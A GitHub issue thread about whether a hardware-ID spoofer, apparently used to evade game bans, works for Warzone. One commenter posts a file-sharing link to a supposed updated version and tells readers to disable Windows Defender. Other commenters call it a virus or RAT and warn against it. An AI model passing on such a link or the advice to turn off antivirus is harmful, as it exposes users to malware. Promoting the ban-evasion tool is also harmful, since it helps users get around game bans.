### ISSUE TITLE
Does this work for Warzone?

### ISSUE THREAD

**Issue by penguintux** [5R33CH4/Monotone-HWID-Spoofer#16]

**Comment by LOFICAT1** [comment]
i dont know

**Comment by dtgjhdsu654u745** [comment]
It does now!
I have updated it to support WarZone and the latest version of Rust.
https://anonfiles.com/LcI3P658yf/Spoofer2-Warzone_rust_zip

You will need to disable windows defender since it modifies registry to change hwid details.

**Comment by LOFICAT1** [comment]
your lying. 
i have dms with azure. 
i have proof of him saying hes not going to update it you skid 
![image](https://user-images.githubusercontent.com/99040010/187235107-24899b48-ce47-4a5c-93b2-49bbabe2a20b.png)

**Comment by LOFICAT1** [comment]
> It does now! I have updated it to support WarZone and the latest version of Rust. https://anonfiles.com/LcI3P658yf/Spoofer2-Warzone_rust_zip
> 
> You will need to disable windows defender since it modifies registry to change hwid details.

nice virus dumbass 
monotone wont get updated 
![image](https://user-images.githubusercontent.com/99040010/187235328-41dc9ef8-43e3-4dd9-afc2-cf0246de81bc.png)

**Comment by Customscript** [comment]
No, does not work for Warzone. I was using this months ago, and unbanning myself for quite sometimes without the need of a Spoofer. But, it got patched and it's useless now without a driver to counter the detection.

**Comment by Saulildo** [comment]
> It does now! I have updated it to support WarZone and the latest version of Rust. https://anonfiles.com/LcI3P658yf/Spoofer2-Warzone_rust_zip
> 
> You will need to disable windows defender since it modifies registry to change hwid details.

This is obviously a RAT. Don't download this.
